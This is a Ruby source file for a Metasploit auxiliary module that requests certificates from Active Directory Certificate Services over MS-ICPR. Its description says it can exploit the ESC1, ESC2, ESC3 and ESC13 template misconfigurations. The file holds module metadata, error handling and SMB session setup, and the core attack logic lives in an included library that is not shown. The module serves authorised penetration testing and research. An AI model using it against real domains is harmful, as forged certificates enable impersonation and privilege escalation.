modules/auxiliary/admin/dcerpc/icpr_cert.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'ruby_smb/dcerpc/client'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::MsIcpr
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::DCERPC
include Msf::Auxiliary::Report
include Msf::OptionalSession::SMB
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ICPR Certificate Management',
'Description' => %q{
Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
template's configuration the resulting certificate can be used for various operations such as authentication.
PFX certificate files that are saved are encrypted with a blank password.
This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
},
'License' => MSF_LICENSE,
'Author' => [
'Will Schroeder', # original idea/research
'Lee Christensen', # original idea/research
'Oliver Lyak', # certipy implementation
'Spencer McIntyre'
],
'References' => [
[ 'URL', 'https://github.com/GhostPack/Certify' ],
[ 'URL', 'https://github.com/ly4k/Certipy' ]
],
'Notes' => {
'Reliability' => [],
'Stability' => [],
'SideEffects' => [ IOC_IN_LOGS ],
'AKA' => [ 'Certifry', 'Certipy' ]
},
'Actions' => [
[ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
],
'DefaultAction' => 'REQUEST_CERT'
)
)
end
def run
send("action_#{action.name.downcase}")
rescue MsIcprConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue MsIcprAuthenticationError => e
fail_with(Failure::NoAccess, e.message)
rescue MsIcprNotFoundError => e
fail_with(Failure::NotFound, e.message)
rescue MsIcprUnexpectedReplyError => e
fail_with(Failure::UnexpectedReply, e.message)
rescue MsIcprUnknownError => e
fail_with(Failure::Unknown, e.message)
end
def action_request_cert
with_ipc_tree do |opts|
request_certificate(opts)
end
end
# @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.
# @return [void]
def with_ipc_tree
opts = {}
if session
print_status("Using existing session #{session.sid}")
client = session.client
self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")
end
yield opts
ensure
opts[:tree].disconnect! if opts[:tree]
end
end